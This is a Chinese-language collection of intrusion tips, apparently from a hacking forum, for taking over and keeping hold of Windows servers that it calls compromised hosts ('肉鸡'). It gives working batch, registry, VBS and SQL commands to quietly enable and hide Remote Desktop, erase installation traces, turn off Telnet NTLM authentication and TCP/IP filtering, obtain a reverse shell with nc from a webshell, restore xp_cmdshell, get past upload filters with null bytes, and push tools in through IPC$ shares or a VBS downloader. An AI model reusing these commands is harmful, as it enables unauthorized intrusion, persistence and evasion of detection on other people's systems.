入侵技巧总结

1、查看3389端口总结一、导出注册表法regedit /e tsport.reg "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp"然后 type tsport.reg | find "PortNumber"结果如果是d3d的话就证明是3389端口如果是其他的 转换成10进制就可以了。二、脚本利用法Dim ReadComputerName Set ReadComputerName=WScript.CreateObject("WScr

2、ipt.Shell") Dim TSName,TSRegPathTSRegPath="HKLMSystemCurrentControlSetControlTerminal ServerWinStationsRDP-TcpPortNumber" TSName=ReadComputerName.RegRead(TSRegPath) WScript.Echo("终端端口为"&TSName)WScript.Echo()WScript.Echo("本程序是帮助你找到终端的端口")WScript.Echo("Pixy&

3、quot;)把以上代码保存为vbs文件，如“3389port.vbs”然后在命令行下运行cscript 3389port.vbs 即可查看终端端口（桌面环境下可直接点击查看）。三、ASP实现法sub get_terminal_port()terminal_port_path="HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp"terminal_port_key="PortNumber"termport=wsh.regread(terminal

4、_port_path&terminal_port_key)if termport="" or err.number<>0 thenresponse.write "无法得到终端服务端口。请检查权限是否已经受到限制。<br>"elseresponse.write "当前终端服务端口: "&termport&"<br>"end ifend sub四、利用工具C3389.exe=开启XP And 2003终端的方法xp、2003开终端的方法和2000、nt（ts

5、version）不一样，不是通过安装，因为xp、2003已经自动安装的远程桌面功能，只是启动不启动的问题。通过下面这个批处理就能在命令行下激活xp、2003的远程桌面功能echo windows registry editor version 5.00>>3389.reg echo hkey_local_machinesystemcurrentcontrolsetcontrolterminal server>>3389.reg echo "fdenytsconnections"=dword:00000000>>3389.reg echo

6、hkey_local_machinesystemcurrentcontrolsetcontrolterminal serverwdsrdpwdtdstcp>>3389.reg echo "portnumber"=dword:00000d3d>>3389.reg echo hkey_local_machinesystemcurrentcontrolsetcontrolterminal serverwinstationsrdp-tcp>>3389.reg echo "portnumber"=dword:00000d3d&g

7、t;>3389.reg regedit /s 3389.reg del 3389.reg=修改3389端口方法（修改后不易被扫出）修改服务器端的端口设置,注册表有2个地方需要修改HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminalServerWdsrdpwdTdstcp PortNumber值，默认是3389，修改成所希望的端口，比如6000第二个地方：HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-TcpPortNumb

8、er值，默认是3389，修改成所希望的端口，比如6000现在这样就可以了。重启系统就可以了.=打开3389端口的5种方法怎么样开3389端口，这里我把他们总结一下，很全面,希望对你有用: 1，打开记事本，编辑内容如下： echo Components > c:sql echo TSEnable = on >> c:sql sysocmgr /i:c:winntinfsysoc.inf /u:c:sql /q 编辑好后存为BAT文件，上传至肉鸡，执行。这里值得注意的是要确定winnt是否在c盘，如果在其他盘则需要改动。2 (对xp2000都有效) 脚本文件 本地开3389 工具

9、:rots1.05 使用方法： 在命令行方式下使用windows自带的脚本宿主程序cscript.exe调用脚本，例如：c:>cscript ROTS.vbs <目标IP> <用户名> <密码> 服务端口 自动重起选项服务端口： 设置终端服务的服务端口。默认是3389。 自动重起选项： 使用/r表示安装完成后自动重起目标使设置生效。 使用/fr表示强制重起目标。（如果/r不行，可以试试这个） 使用此参数时，端口设置不能忽略。运行CMD（2000下的DOS），我们给它开终端！ 命令如下！ 脚本会判断目标系统类型，如果不是server及以上版本，就会提示你

10、是否要取消。 因为pro版不能安装终端服务。 如果你确信脚本判断错误，就继续安装好了。脚本访问的目标的135端口，如果目标135端口未开放，或者WMI服务关闭，那么脚本就没用了。3，下载3389自动安装程序-djshao正式版5.0 说明： 特点：1、不用修改注册表的安装路径，注册表会自动修改，安装完后会自动恢复到原来的安装路径，2、在后台安静模式运行，就算肉鸡旁有人也没有关系！3、在添加和删除中看不出终端服务被安装的痕迹，也就是启动终端前不会打钩，4、不会在肉鸡上留下你的上传文件，在安装完终端服务后会会自动删除你上传到c:winnttemp下的任何文件！5、不管肉鸡的winnt装在什么盘上都

11、无所谓！6、安装完终端后会删除在管理工具中的终端快捷图标！7、在没有安装终端前，终端服务是被禁止的！安装终端后，终端服务被改为自动！但是如果在安装前终端服务是手动！安装后就可能还是手动！等重启后就不会打开服务！所以在软件中加了sc指令，等安装完后，不管终端服务是禁止还是手动还是自动，全部改为自动。8、自动检测肉鸡是不是服务器版，如果不是删除原文件，不执行安装，如果是服务器版就执行安装！9、支持中日韩繁四个版本的win2000服务器版！安装注册完毕后输入对方IP用户名密码，等待出现是否安装的对话框点是。 复制启动后出现对方桌面。 在对方桌面进入控制面版，点添加或删除程序。进入后点添加/删除win

12、dows组件，找到终端服务，点际进入后在启动终端服务上打上勾。确定自动提示重起，重起后OK=终端服务器超出了最大允许连接数的解决办法1、首先你可以telnet到此主机上(不管你用哪种方法)，当然如果能直接操作机器更好，不过直接操作就不必用命令行了，用控制台更直观，这里不是我们讲述的问题，略过。2、Telnet上去后,先看登陆的用户：输入命令：query user系统返回：USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIMEadministrator console 0 运行中 . 2004-10-09 15:37user1 UserMachine

13、1 1 运行中 . 2004-10-09 15:37user2 12 已断开 无 2004-10-09 15:37此时可以看出的可能根我们的不一样，根据具体情况而定。看到吗? ID 0 的用户是本地登陆的,ID 1 和 ID 12是3389登陆的用户,前者在运行中，后者已经断开了,但是断开了仍然占用系统资源和通道，我们要把它踢掉。如下进行操作即可。输入命令：logoff 12C:>query user /再看看USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIMEadministrator console 0 运行中 . 2004-10-09

14、 15:37user1 UserMachine1 1 运行中 . 2004-10-09 15:37mstsc /console /v:IP:终端端口 T管理=对于Telnet的HTLM身份验证的突破方法总结By:独孤依人SST对于Telnet的HTLM身份验证的突破方法常用以下四种方法：1、新建用户法telnet对方ip，发现需要 NTLM 身份验证。我们在自己的电脑里建立一个要登录的远程帐号和密码都相同的身份为管理员的账户。找到c:winntsystem32cmd.exe 建立一个快捷方式到桌面。修改cmd的快捷方式属性为允许其他身份登陆。然后运行桌面上的cmd.exe的快捷方式。输入刚才新

15、建的帐号和密码，telnet对方ip，直接可以登陆对方电脑了。 这种方法我以前常用的，实用性较强2、命令法那就是直接运行命令：tlntadmn config sec = -ntlm运行以后就去掉了该死的ntlm认证：）3、上传ntml.exe法这种方法有很多缺点，比如：对方有杀毒软件，网段屏蔽了TFTP等等.4、telnet配置信息写入法直接写入telnet的配置信息到文本中然后在用shell执行。 这种办法非常麻烦。对于Telnet的HTLM身份验证的突破方法用1或2中方法就可解决！=解除TCP/IP筛选 的方法总结TCP/IP筛选在注册表里有三处，分别是：HKEY_LOCAL_MACHIN

16、ESYSTEMControlSet001ServicesTcpipHKEY_LOCAL_MACHINESYSTEMControlSet002ServicesTcpipHKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTcpip分别用regedit -e D:a.reg HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTcpipregedit -e D:b.reg HKEY_LOCAL_MACHINESYSTEMControlSet002ServicesTcpipregedit -e D:c.reg

17、 HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTcpip命令来导出注册表项然后把 三个文件里的EnableSecurityFilters"=dword:00000001，改成EnableSecurityFilters"=dword:00000000再将以上三个文件分别用regedit -s D:a.regregedit -s D:b.regregedit -s D:c.reg导入注册表即可附：解除TCP/IP限制的小技巧 1.用NC反弹得到一个shell本机监听 NC -l -p 32WEBSHELL运行：得到一个she

18、ll2.CMD下导出注册表文件C:>regedit -e x:xxx1.reg HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesTcpipC:>regedit -e x:xxx2.reg HKEY_LOCAL_MACHINESYSTEMControlSet002ServicesTcpipC:>regedit -e x:xxx3.reg HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTcpip修改各文件 EnableSecurityFilters 处将最后的1改为03.将注册表文件导入

19、x:xxx>regedit -s 1.regx:xxx>regedit -s 2.regx:xxx>regedit -s 3.reg-S 为无提示重启命令 iisreset /reboot完成TCP/IP筛选限制=xp_cmdshell新的恢复办法xp_cmdshell新的恢复办法扩展储存过程被删除以后可以有很简单的办法恢复：删除drop procedure sp_addextendedprocdrop procedure sp_oacreateexec sp_dropextendedproc 'xp_cmdshell'恢复dbcc addextendedpr

20、oc ("sp_oacreate","odsole70.dll")dbcc addextendedproc ("xp_cmdshell","xplog70.dll")这样可以直接恢复，不用去管sp_addextendedproc是不是存在-删除扩展存储过过程xp_cmdshell的语句:exec sp_dropextendedproc 'xp_cmdshell'恢复cmdshell的sql语句exec sp_addextendedproc xp_cmdshell ,dllname ='xpl

21、og70.dll'开启cmdshell的sql语句exec sp_addextendedproc xp_cmdshell ,dllname ='xplog70.dll'判断存储扩展是否存在返回结果为1就ok恢复xp_cmdshell返回结果为1就ok堵上cmdshell的sql语句sp_dropextendedproc "xp_cmdshel=文件上传方法汇总文件上传是很早以前的事了，最早那会常用的就是IPC连接，然后一个一个的COPY，自从动网upfile漏洞出来以后，各种脚本系统如PHP.JSP下的文件漏洞纷纷暴出，原理都是大同小异，没有过滤文件上传路径，

22、导致可以抓包然后把空格20改成00，变成空字符NULL，系统是从右往左识别的，所以到空字符那就截断了，更简单的就是过滤文件上传类型不完整，改后缀就可以解决了，这些上传文件的漏洞，用万能上传工具就可以轻松搞定，不过漏洞文件名不同罢了。还有一些另类的文件上传方法，是在系统做了比较好的防范下完成的，资料来源感谢CD-LION提供一。先COPY个winshell.exe吧,开个telnet端口,命令行下总比在浏览器里方便啊.copy myIPc$toolswinshell.exe d:downloadswinzip32 已复制一个文件启动它 d:downloadswinzip32winshell.ex

23、e 浏览器窗口会停好久,不用等的,程序已经启动了,点停止,接着,断开共享连接: net use myIPc$ /del 完成如果ftp被关了,sendmail也不行,如何把编译好的文件上传到主机呢? 方法很简单: 1.先把要上传的文件用uuedcode进行编码,文件会变成大概下面的样子: begin 644 file.bat M.C!J95T92TP,#503U!=:%=E6#5D9%!>,2Q&1D9&1C$L1D9&,2PT<E!>4%J M95T85!9+7M04%28#!*CTP,'500D)04%!049+04"4$E$34

24、-"04Q%04I- M3D-"2D%,24%!14U-3D-"1D5'24=&0T%3D="1T1(0T=02$='2DA#2$9(1$-! M1TI(1$-!1T1'4$=.1TI'3T=(0T%#3T-/0T#3T-/0T!3D%+0T5!07%Q<7$ M"D!%0TA/($&1B*0T062E,"Y"050+T(0SI<0D%45DE2+D-/32O0BO E62*0SI<0D%45DE2+D-/32*1$5,($,Z7$)!5%9)4BY#3TT&

25、quot; end sum -r/size 17903/262 全部都是可见的ASCII字符了2.用TELNET连接到主机后输入 $ cat >a 然后用WINODWS的拷贝/粘贴,把文件粘贴到telnet窗口 按d 在当前目录下产生文件a 3.uudecode a 文件复原,然后chmod即可3脚本是非常好的东西，只要把源码保存到一个文件中就能运行。所以在shell下，用 echo语句直接写到一个文件中，在用相应的解释程序执行就可以啦。这里是一个程序 实例的简化: echo Set xPost = CreateObject("Microsoft.XMLHTTP") >167168.vbs echo xPost.Send() >>167168.vbs echo Set sGet = CreateObject("ADODB.Stream") >>167168.vbs echo sGet.Mode = 3 >>1